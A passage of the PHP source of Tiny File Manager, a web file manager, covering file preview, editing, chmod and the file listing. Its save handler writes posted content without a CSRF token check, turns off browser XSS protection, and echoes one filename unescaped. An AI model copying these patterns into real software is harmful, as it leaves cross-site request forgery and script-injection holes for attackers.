(!$fn['folder']) { $total_files++; } $total_comp += $fn['compressed_size']; $total_uncomp += $fn['filesize']; } ?> <li class="list-group-item"><?php echo lng('Files in archive') ?>: <?php echo $total_files ?></li> <li class="list-group-item"><?php echo lng('Total size') ?>: <?php echo fm_get_filesize($total_uncomp) ?></li> <li class="list-group-item"> <?php echo lng('Size in archive') ?>: <?php echo fm_get_filesize($total_comp) ?></li> <li class="list-group-item"><?php echo lng('Compression') ?>: <?php echo round(($total_comp / max($total_uncomp, 1)) * 100) ?>%</li> <?php } // Image info if ($is_image) { $image_size = getimagesize($file_path); echo '<li class="list-group-item"><strong>' . lng('Image size') . ':</strong> ' . (isset($image_size[0]) ? $image_size[0] : '0') . ' x ' . (isset($image_size[1]) ? $image_size[1] : '0') . '</li>'; } // Text info if ($is_text) { $is_utf8 = fm_is_utf8($content); if (function_exists('iconv')) { if (!$is_utf8) { $content = iconv(FM_ICONV_INPUT_ENC, 'UTF-8//IGNORE', $content); } } echo '<li class="list-group-item"><strong>' . lng('Charset') . ':</strong> ' . ($is_utf8 ? 'utf-8' : '8 bit') . '</li>'; } ?> </ul> <div class="btn-group btn-group-sm flex-wrap" role="group"> <form method="post" class="d-inline mb-0 btn btn-outline-primary" action="?p=<?php echo urlencode(FM_PATH) ?>&dl=<?php echo urlencode($file) ?>"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <button type="submit" class="btn btn-link btn-sm text-decoration-none fw-bold p-0"><i class="fa fa-cloud-download"></i> <?php echo lng('Download') ?></button> </form> <?php if (!FM_READONLY): ?> <a class="fw-bold btn btn-outline-primary" title="<?php echo lng('Delete') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&del=<?php echo urlencode($file) ?>" onclick="confirmDailog(event, 1209, '<?php echo lng('Delete') . ' ' . lng('File'); ?>','<?php echo urlencode($file); ?>', this.href);"> <i class="fa fa-trash"></i> Delete</a> <?php endif; ?> <a class="fw-bold btn btn-outline-primary" href="<?php echo fm_enc($file_url) ?>" target="_blank"><i class="fa fa-external-link-square"></i> <?php echo lng('Open') ?></a></b> <?php // ZIP actions if (!FM_READONLY && ($is_zip || $is_gzip) && $filenames !== false) { $zip_name = pathinfo($file_path, PATHINFO_FILENAME); ?> <form method="post" class="d-inline btn btn-outline-primary mb-0"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>"> <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0 border-0" style="font-size: 14px;"><i class="fa fa-check-circle"></i> <?php echo lng('UnZip') ?></button> </form> <form method="post" class="d-inline btn btn-outline-primary mb-0"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <input type="hidden" name="unzip" value="<?php echo urlencode($file); ?>"> <input type="hidden" name="tofolder" value="1"> <button type="submit" class="btn btn-link text-decoration-none fw-bold p-0" style="font-size: 14px;" title="UnZip to <?php echo fm_enc($zip_name) ?>"><i class="fa fa-check-circle"></i> <?php echo lng('UnZipToFolder') ?></button> </form> <?php } if ($is_text && !FM_READONLY) { ?> <a class="fw-bold btn btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&edit=<?php echo urlencode($file) ?>" class="edit-file"> <i class="fa fa-pencil-square"></i> <?php echo lng('Edit') ?> </a> <a class="fw-bold btn btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&edit=<?php echo urlencode($file) ?>&env=ace" class="edit-file"><i class="fa fa-pencil-square"></i> <?php echo lng('AdvancedEditor') ?> </a> <?php } ?> <a class="fw-bold btn btn-outline-primary" href="?p=<?php echo urlencode(FM_PATH) ?>"><i class="fa fa-chevron-circle-left go-back"></i> <?php echo lng('Back') ?></a> </div> <div class="row mt-3"> <?php if ($is_onlineViewer) { if ($online_viewer == 'google') { echo '<iframe src="https://docs.google.com/viewer?embedded=true&hl=en&url=' . fm_enc($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>'; } else if ($online_viewer == 'microsoft') { echo '<iframe src="https://view.officeapps.live.com/op/embed.aspx?src=' . fm_enc($file_url) . '" frameborder="no" style="width:100%;min-height:460px"></iframe>'; } } elseif ($is_zip) { // ZIP content if ($filenames !== false) { echo '<code class="maxheight">'; foreach ($filenames as $fn) { if ($fn['folder']) { echo '<b>' . fm_enc($fn['name']) . '</b><br>'; } else { echo $fn['name'] . ' (' . fm_get_filesize($fn['filesize']) . ')<br>'; } } echo '</code>'; } else { echo '<p>' . lng('Error while fetching archive info') . '</p>'; } } elseif ($is_image) { // Image content if (in_array($ext, array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))) { echo '<p><input type="checkbox" id="preview-img-zoomCheck"><label for="preview-img-zoomCheck"><img src="' . fm_enc($file_url) . '" alt="image" class="preview-img"></label></p>'; } } elseif ($is_audio) { // Audio content echo '<p><audio src="' . fm_enc($file_url) . '" controls preload="metadata"></audio></p>'; } elseif ($is_video) { // Video content echo '<div class="preview-video"><video src="' . fm_enc($file_url) . '" width="640" height="360" controls preload="metadata"></video></div>'; } elseif ($is_text) { if (FM_USE_HIGHLIGHTJS) { // highlight $hljs_classes = array( 'shtml' => 'xml', 'htaccess' => 'apache', 'phtml' => 'php', 'lock' => 'json', 'svg' => 'xml', ); $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext; if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) { $hljs_class = 'nohighlight'; } $content = '<pre class="with-hljs"><code class="' . $hljs_class . '">' . fm_enc($content) . '</code></pre>'; } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) { // php highlight $content = highlight_string($content, true); } else { $content = '<pre>' . fm_enc($content) . '</pre>'; } echo $content; } ?> </div> </div> </div> <?php fm_show_footer(); exit; } // file editor if (isset($_GET['edit']) && !FM_READONLY) { $file = $_GET['edit']; $file = fm_clean_path($file, false); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file, $path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } $editFile = ' : <i><b>' . $file . '</b></i>'; header('X-XSS-Protection:0'); fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file); $file_path = $path . '/' . $file; // normal editer $isNormalEditor = true; if (isset($_GET['env'])) { if ($_GET['env'] == "ace") { $isNormalEditor = false; } } // Save File if (isset($_POST['savedata'])) { $writedata = $_POST['savedata']; $fd = fopen($file_path, "w"); @fwrite($fd, $writedata); fclose($fd); fm_set_msg(lng('File Saved Successfully')); } $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION)); $mime_type = fm_get_mime_type($file_path); $filesize = filesize($file_path); $is_text = false; $content = ''; // for text if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) { $is_text = true; $content = file_get_contents($file_path); } ?> <div class="path"> <div class="row"> <div class="col-xs-12 col-sm-5 col-lg-6 pt-1"> <div class="btn-toolbar" role="toolbar"> <?php if (!$isNormalEditor) { ?> <div class="btn-group js-ace-toolbar"> <button data-cmd="none" data-option="fullscreen" class="btn btn-sm btn-outline-secondary" id="js-ace-fullscreen" title="<?php echo lng('Fullscreen') ?>"><i class="fa fa-expand" title="<?php echo lng('Fullscreen') ?>"></i></button> <button data-cmd="find" class="btn btn-sm btn-outline-secondary" id="js-ace-search" title="<?php echo lng('Search') ?>"><i class="fa fa-search" title="<?php echo lng('Search') ?>"></i></button> <button data-cmd="undo" class="btn btn-sm btn-outline-secondary" id="js-ace-undo" title="<?php echo lng('Undo') ?>"><i class="fa fa-undo" title="<?php echo lng('Undo') ?>"></i></button> <button data-cmd="redo" class="btn btn-sm btn-outline-secondary" id="js-ace-redo" title="<?php echo lng('Redo') ?>"><i class="fa fa-repeat" title="<?php echo lng('Redo') ?>"></i></button> <button data-cmd="none" data-option="wrap" class="btn btn-sm btn-outline-secondary" id="js-ace-wordWrap" title="<?php echo lng('Word Wrap') ?>"><i class="fa fa-text-width" title="<?php echo lng('Word Wrap') ?>"></i></button> <select id="js-ace-mode" data-type="mode" title="<?php echo lng('Select Document Type') ?>" class="btn-outline-secondary border-start-0 d-none d-md-block"> <option>-- <?php echo lng('Select Mode') ?> --</option> </select> <select id="js-ace-theme" data-type="theme" title="<?php echo lng('Select Theme') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"> <option>-- <?php echo lng('Select Theme') ?> --</option> </select> <select id="js-ace-fontSize" data-type="fontSize" title="<?php echo lng('Select Font Size') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"> <option>-- <?php echo lng('Select Font Size') ?> --</option> </select> </div> <?php } ?> </div> </div> <div class="edit-file-actions col-xs-12 col-sm-7 col-lg-6 text-end pt-1"> <div class="btn-group"> <a title=" <?php echo lng('Back') ?>" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&view=<?php echo urlencode($file) ?>"><i class="fa fa-reply-all"></i> <?php echo lng('Back') ?></a> <a title="<?php echo lng('BackUp') ?>" class="btn btn-sm btn-outline-primary" href="javascript:void(0);" onclick="backup('<?php echo urlencode(trim(FM_PATH)) ?>','<?php echo urlencode($file) ?>')"><i class="fa fa-database"></i> <?php echo lng('BackUp') ?></a> <?php if ($is_text) { ?> <?php if ($isNormalEditor) { ?> <a title="Advanced" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&edit=<?php echo urlencode($file) ?>&env=ace"><i class="fa fa-pencil-square-o"></i> <?php echo lng('AdvancedEditor') ?></a> <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fm_enc($file_url) ?>" onclick="edit_save(this,'nrl')"><i class="fa fa-floppy-o"></i> Save </button> <?php } else { ?> <a title="Plain Editor" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&edit=<?php echo urlencode($file) ?>"><i class="fa fa-text-height"></i> <?php echo lng('NormalEditor') ?></a> <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fm_enc($file_url) ?>" onclick="edit_save(this,'ace')"><i class="fa fa-floppy-o"></i> <?php echo lng('Save') ?> </button> <?php } ?> <?php } ?> </div> </div> </div> <?php if ($is_text && $isNormalEditor) { echo '<textarea class="mt-2" id="normal-editor" rows="33" cols="120" style="width: 99.5%;">' . htmlspecialchars($content) . '</textarea>'; echo '<script>document.addEventListener("keydown", function(e) {if ((window.navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey) && e.keyCode == 83) { e.preventDefault();edit_save(this,"nrl");}}, false);</script>'; } elseif ($is_text) { echo '<div id="editor" contenteditable="true">' . htmlspecialchars($content) . '</div>'; } else { fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error'); } ?> </div> <?php fm_show_footer(); exit; } // chmod (not for Windows) if (isset($_GET['chmod']) && !FM_READONLY && !FM_IS_WIN) { $file = $_GET['chmod']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || (!is_file($path . '/' . $file) && !is_dir($path . '/' . $file))) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH = FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path $file_url = FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file; $file_path = $path . '/' . $file; $mode = fileperms($path . '/' . $file); ?> <div class="path"> <div class="card mb-2" data-bs-theme="<?php echo FM_THEME; ?>"> <h6 class="card-header"> <?php echo lng('ChangePermissions') ?> </h6> <div class="card-body"> <p class="card-text"> <?php $display_path = fm_get_display_path($file_path); ?> <?php echo $display_path['label']; ?>: <?php echo $display_path['path']; ?><br> </p> <form action="" method="post"> <input type="hidden" name="p" value="<?php echo fm_enc(FM_PATH) ?>"> <input type="hidden" name="chmod" value="<?php echo fm_enc($file) ?>"> <table class="table compact-table" data-bs-theme="<?php echo FM_THEME; ?>"> <tr> <td></td> <td><b><?php echo lng('Owner') ?></b></td> <td><b><?php echo lng('Group') ?></b></td> <td><b><?php echo lng('Other') ?></b></td> </tr> <tr> <td style="text-align: right"><b><?php echo lng('Read') ?></b></td> <td><label><input type="checkbox" name="ur" value="1" <?php echo ($mode & 00400) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="gr" value="1" <?php echo ($mode & 00040) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="or" value="1" <?php echo ($mode & 00004) ? ' checked' : '' ?>></label></td> </tr> <tr> <td style="text-align: right"><b><?php echo lng('Write') ?></b></td> <td><label><input type="checkbox" name="uw" value="1" <?php echo ($mode & 00200) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="gw" value="1" <?php echo ($mode & 00020) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="ow" value="1" <?php echo ($mode & 00002) ? ' checked' : '' ?>></label></td> </tr> <tr> <td style="text-align: right"><b><?php echo lng('Execute') ?></b></td> <td><label><input type="checkbox" name="ux" value="1" <?php echo ($mode & 00100) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="gx" value="1" <?php echo ($mode & 00010) ? ' checked' : '' ?>></label></td> <td><label><input type="checkbox" name="ox" value="1" <?php echo ($mode & 00001) ? ' checked' : '' ?>></label></td> </tr> </table> <p> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-primary"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b> <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Change') ?></button> </p> </form> </div> </div> </div> <?php fm_show_footer(); exit; } // --- TINYFILEMANAGER MAIN --- fm_show_header(); // HEADER fm_show_nav_path(FM_PATH); // current path // show alert messages fm_show_message(); $num_files = count($files); $num_folders = count($folders); $all_files_size = 0; ?> <form action="" method="post" class="pt-3"> <input type="hidden" name="p" value="<?php echo fm_enc(FM_PATH) ?>"> <input type="hidden" name="group" value="1"> <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> <div class="table-responsive"> <table class="table table-bordered table-hover table-sm" id="main-table" data-bs-theme="<?php echo FM_THEME; ?>"> <thead class="thead-white"> <tr> <?php if (!FM_READONLY): ?> <th style="width:3%" class="custom-checkbox-header"> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="js-select-all-items" onclick="checkbox_toggle()"> <label class="custom-control-label" for="js-select-all-items"></label> </div> </th><?php endif; ?> <th><?php echo lng('Name') ?></th> <th><?php echo lng('Size') ?></th> <th><?php echo lng('Modified') ?></th> <?php if (!FM_IS_WIN && !$hide_Cols): ?> <th><?php echo lng('Perms') ?></th> <th><?php echo lng('Owner') ?></th><?php endif; ?> <th><?php echo lng('Actions') ?></th> </tr> </thead> <?php // link to parent folder if ($parent !== false) { ?> <tr><?php if (!FM_READONLY): ?> <td class="nosort"></td><?php endif; ?> <td class="border-0" data-sort><a href="?p=<?php echo urlencode($parent) ?>"><i class="fa fa-chevron-circle-left go-back"></i> ..</a></td> <td class="border-0" data-order></td> <td class="border-0" data-order></td> <td class="border-0"></td> <?php if (!FM_IS_WIN && !$hide_Cols) { ?> <td class="border-0"></td> <td class="border-0"></td> <?php } ?> </tr> <?php } $ii = 3399; foreach ($folders as $f) { $is_link = is_link($path . '/' . $f); $img = $is_link ? 'icon-link_folder' : 'fa fa-folder-o'; $modif_raw = filemtime($path . '/' . $f); $modif = date(FM_DATETIME_FORMAT, $modif_raw); $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw)); $filesize_raw = ""; $filesize = lng('Folder'); $perms = substr(decoct(fileperms($path . '/' . $f)), -4); $owner = array('name' => '?'); $group = array('name' => '?'); if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { try { $owner_id = fileowner($path . '/' . $f); if ($owner_id != 0) { $owner_info = posix_getpwuid($owner_id); if ($owner_info) { $owner = $owner_info; } } $group_id = filegroup($path . '/' . $f); $group_info = posix_getgrgid($group_id); if ($group_info) { $group = $group_info; } } catch (Exception $e) { error_log("exception:" . $e->getMessage()); } } ?> <tr> <?php if (!FM_READONLY): ?> <td class="custom-checkbox-td"> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="<?php echo $ii ?>" name="file[]" value="<?php echo fm_enc($f) ?>"> <label class="custom-control-label" for="<?php echo $ii ?>"></label> </div> </td> <?php endif; ?> <td data-sort=<?php echo fm_convert_win(fm_enc($f)) ?>> <div class="filename"> <a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fm_enc($f)) ?></a> <?php echo ($is_link ? ' → <i>' . readlink($path . '/' . $f) . '</i>' : '') ?> </div> </td> <td data-order="a-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT); ?>"> <?php echo $filesize; ?> </td> <td data-order="a-<?php echo $date_sorting; ?>"><?php echo $modif ?></td> <?php if (!FM_IS_WIN && !$hide_Cols): ?> <td> <?php if (!FM_READONLY): ?><a title="Change Permissions" href="?p=<?php echo urlencode(FM_PATH) ?>&chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?> </td> <td> <?php echo $owner['name'] . ':' . $group['name'] ?> </td> <?php endif; ?> <td class="inline-actions"><?php if (!FM_READONLY): ?> <a title="<?php echo lng('Delete') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, '1028','<?php echo lng('Delete') . ' ' . lng('Folder'); ?>','<?php echo urlencode($f) ?>', this.href);"> <i class="fa fa-trash-o" aria-hidden="true"></i></a> <a title="<?php echo lng('Rename') ?>" href="#" onclick="rename('<?php echo fm_enc(addslashes(FM_PATH)) ?>', '<?php echo fm_enc(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o" aria-hidden="true"></i></a> <a title="<?php echo lng('CopyTo') ?>..." href="?p=&copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o" aria-hidden="true"></i></a> <?php endif; ?> <a title="<?php echo lng('DirectLink') ?>" href="<?php echo fm_enc(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f . '/') ?>" target="_blank"><i class="fa fa-link" aria-hidden="true"></i></a> </td> </tr> <?php flush(); $ii++; } $ik = 8002; foreach ($files as $f) { $is_link = is_link($path . '/' . $f); $img = $is_link ? 'fa fa-file-text-o' : fm_get_file_icon_class($path . '/' . $f); $modif_raw = filemtime($path . '/' . $f); $modif = date(FM_DATETIME_FORMAT, $modif_raw); $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw)); $filesize_raw = fm_get_size($path . '/' . $f); $filesize = fm_get_filesize($filesize_raw); $filelink = '?p=' . urlencode(FM_PATH) . '&view=' . urlencode($f); $all_files_size += $filesize_raw; $perms = substr(decoct(fileperms($path . '/' . $f)), -4); $owner = array('name' => '?'); $group = array('name' => '?'); if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) { try { $owner_id = fileowner($path . '/' . $f); if ($owner_id != 0) { $owner_info = posix_getpwuid($owner_id); if ($owner_info) { $owner = $owner_info; } } $group_id = filegroup($path . '/' . $f); $group_info = posix_getgrgid($group_id); if ($group_info) { $group = $group_info; } } catch (Exception $e) { error_log("exception:" . $e->getMessage()); } } ?> <tr> <?php if (!FM_READONLY): ?> <td class="custom-checkbox-td"> <div class="custom-control custom-checkbox"> <input type="checkbox" class="custom-control-input" id="<?php echo $ik ?>" name="file[]" value="<?php echo fm_enc($f) ?>"> <label class="custom-control-label" for="<?php echo $ik ?>"></label> </div> </td><?php endif; ?> <td data-sort=<?php echo fm_enc($f) ?>> <div class="filename"> <?php if (in_array(strtolower(pathinfo($f, PATHINFO_EXTENSION)), array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))): ?> <?php $imagePreview = fm_enc(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f); ?> <a href="<?php echo $filelink ?>" data-preview-image="<?php echo $imagePreview ?>" title="<?php echo fm_enc($f) ?>"> <?php else: ?> <a href="<?php echo $filelink ?>" title="<?php echo $f ?>"> <?php endif; ?> <i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fm_enc($f)) ?> </a> <?php echo ($is_link ? ' → <i>' . readlink($path . '/' . $f) . '</i>' : '') ?> </div> </td> <td data-order="b-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT); ?>"><span title="<?php printf('%s bytes', $filesize_raw) ?>"> <?php echo $filesize; ?> </span></td> <td data-order="b-<?php echo $date_sorting; ?>"><?php echo $modif ?></td> <?php if (!FM_IS_WIN && !$hide_Cols): ?> <td><?php if (!FM_READONLY): ?><a title="<?php echo 'Change Permissions' ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?> </td> <td><?php echo fm_enc($owner['name'] . ':' . $group['name']) ?></td> <?php endif; ?> <td class="inline-actions"> <?php if (!FM_READONLY): ?> <a title="<?php echo lng('Delete') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1209, '<?php echo lng('Delete') . ' ' . lng('File'); ?>','<?php echo urlencode($f); ?>', this.href);"> <i class="fa fa-trash-o"></i></a> <a title="<?php echo lng('Rename') ?>" href="#" onclick="rename('<?php echo fm_enc(addslashes(FM_PATH)) ?>', '<?php echo fm_enc(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o"></i></a> <a title="<?php echo lng('CopyTo') ?>..." href="?p=<?php echo urlencode(FM_PATH) ?>&copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o"></i></a> <?php endif; ?> <a title="<?php echo lng('DirectLink') ?>" href="<?php echo fm_enc(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f) ?>" target="_blank"><i class="fa fa-link"></i></a> <a title="<?php echo lng('Download') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&dl=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1211, '<?php echo lng('Download'); ?>','<?php echo urlencode($f); ?>', this.href);"><i class="fa fa-download"></i></a> </td> </tr> <?php flush(); $ik++; } if (empty($folders) && empty($files)) { ?> <tfoot> <tr><?php if (!FM_READONLY): ?> <td></td><?php endif; ?> <td colspan="<?php echo (!FM_IS_WIN && !$hide_Cols) ? '6' : '4' ?>"><em><?php echo lng('Folder is empty') ?></em></td> </tr> </tfoot> <?php } else { ?> <tfoot> <tr> <td class="gray fs-7" colspan="<?php echo (!FM_IS_WIN && !$hide_Cols) ? (FM_READONLY ? '6' : '7') : (FM_READONLY ? '4' : '5') ?>"> <?php echo lng('FullSize') . ': <span class="badge text-bg-light border-radius-0">' . fm_get_filesize($all_files_size) . '</span>' ?> <?php echo lng('File') . ': <span class="badge text-bg-light border-radius-0">' . $num_files . '</span>' ?> <?php echo lng('Folder') . ': <span class="badge text-bg-light border-radius-0">' . $num_folders . '</span>' ?> </td> </tr> </tfoot> <?php } ?> </table> </div> <div class="row"> <?php if (!FM_READONLY): ?> <div class="col-xs-12 col-sm-9"> <div class="btn-group flex-wrap" data-toggle="buttons" role="toolbar"> <a href="#/select-all" class="btn btn-small btn-outline-primary btn-2" onclick="select_all();return false;"><i class="fa fa-check-square"></i> <?php echo lng('SelectAll') ?> </a> <a href="#/unselect-all" class="btn btn-small btn-outline-primary btn-2" onclick="unselect_all();return false;"><i class="fa fa-window-close"></i> <?php echo lng('UnSelectAll') ?> </a> <a href="#/invert-all" class="btn btn-small btn-outline-primary btn-2" onclick="invert_all();return false;"><i class="fa fa-th-list"></i> <?php echo lng('InvertSelection') ?> </a> <input type="submit" class="hidden" name="delete" id="a-delete" value="Delete" onclick="return confirm('<?php echo lng('Delete selected files and folders?'); ?>')"> <a href="javascript:document.getElementById('a-delete').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-trash"></i> <?php echo lng('Delete') ?> </a> <input type="submit" class="hidden" name="zip" id="a-zip" value="zip" onclick="return confirm('<?php echo lng('Create archive?'); ?>')"> <a href="javascript:document.getElementById('a-zip').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Zip') ?> </a> <input type="submit" class="hidden" name="tar" id="a-tar" value="tar" onclick="return confirm('<?php echo lng('Create archive?'); ?>')"> <a href="javascript:document.getElementById('a-tar').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Tar') ?> </a> <input type="submit" class="hidden" name="copy" id="a-copy" value="Copy"> <a href="javascript:document.getElementById('a-copy').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-files-o"></i> <?php echo lng('Copy') ?> </a> </div> </div> <div class="col-3 d-none d-sm-block"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div> <?php else: ?> <div class="col-12"><a href="https://tinyfilemanager.github.io" target="_blank" class="float-right text-muted">Tiny File Manager <?php echo VERSION; ?></a></div> <?php endif; ?> </div> </form> <?php fm_show_footer(); // --- END HTML --- // Functions /** * It prints the css/js files into html * @param key The key of the external file to print. */ function print_external($key) { global $external; if (!array_key_exists($key, $external)) { // throw new Exception('Key missing in external: ' . key); echo ""; return; } echo "$external[$key]"; } /** * Verify CSRF TOKEN and remove after certified * @param string $token * @return bool */ function verifyToken($token) { if (hash_equals($_SESSION['token'], $token)) { return true; } return false; } /** * Delete file or folder (recursively) * @param string $path * @return bool */ function fm_rdelete($path) { if (is_link($path)) { return unlink($path); } elseif (is_dir($path)) { $objects = scandir($path); $ok = true; if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (!fm_rdelete($path . '/' . $file)) { $ok = false; } } } } return ($ok) ? rmdir($path) : false; } elseif (is_file($path)) { return unlink($path); } return false; } /** * Recursive chmod * @param string $path * @param int $filemode * @param int $dirmode * @return bool * @todo Will use in mass chmod */ function fm_rchmod($path, $filemode, $dirmode) { if (is_dir($path)) { if (!chmod($path, $dirmode)) { return false; } $objects = scandir($path); if (is_array($objects)) { foreach ($objects as $file) { if ($file != '.' && $file != '..') { if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) { return false; } } } } return true; } elseif (is_link($path)) { return true; } elseif (is_file($path)) { return chmod($path, $filemode); } return false; } /** * Check the file extension which is allowed or not * @param string $filename * @return bool */ function fm_is_valid_ext($filename) { $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false; $ext = pathinfo($filename, PATHINFO_EXTENSION); $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true; return ($isFileAllowed) ? true : false; } /** * Safely rename * @param string $old * @param string $new * @return bool|null */ function fm_rename($old, $new) { $isFileAllowed = fm_is_valid_ext($new); if (!is_dir($old)) { if (!$isFileAllowed) return false; } return (!file_exists($new) && file_exists($old)) ? rename($old, $new) : null; } /** * Copy file or folder (recursively). * @param string $path * @param string $dest * @param bool $upd Update files * @param bool $force Create folder with same names instead file * @return bool */ function fm_rcopy($path, $dest, $upd = true, $force = true) { if (!is_dir($path) && !is_file($path)) { return false; } if (is_dir($path)) { if (!fm_mkdir($dest, $force)) { return false; } $objects = array_diff(scandir($path), ['.', '..']); foreach ($objects as $file) { if (!fm_rcopy("$path/$file", "$dest/$file", $upd, $force)) { return false; } } return true; } // Handle file copying return fm_copy($path, $dest, $upd); } /** * Safely create folder * @param string $dir * @param bool $force * @return bool */ function fm_mkdir($dir, $force) { if (file_exists($dir)) { if (is_dir($dir)) { return $dir; } elseif (!$force) { return false; } unlink($dir); } return mkdir($dir, 0777, true); } /** * Safely copy file * @param string $f1 * @param string $f2 * @param bool $upd Indicates if file should be updated with new content * @return bool */ function fm_copy($f1, $f2, $upd) { $time1 = filemtime($f1); if (file_exists($f2)) { $time2 = filemtime($f2); if ($time2 >= $time1 && $upd) { return false; } } $ok = copy($f1, $f2); if ($ok) { touch($f2, $time1); } return $ok; } /** * Get mime type * @param string $file_path * @return mixed|string */ function fm_get_mime_type($file_path) { if (function_exists('finfo_open')) { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file_path); finfo_close($finfo); return $mime; } elseif (function_exists('mime_content_type')) { return mime_content_type($file_path); } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) { $file = escapeshellarg($file_path); $mime = shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } /** * HTTP Redirect * @param string $url * @param int $code */ function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } /** * Path traversal prevention and clean the url * It replaces (consecutive) occurrences of / and \\ with whatever is in DIRECTORY_SEPARATOR, and processes /. and /.. fine. * @param $path * @return string */ function get_absolute_path($path) { $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path); $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen'); $absolutes = array(); foreach ($parts as $part) { if ('.' == $part) continue; if ('..' == $part) { array_pop($absolutes); 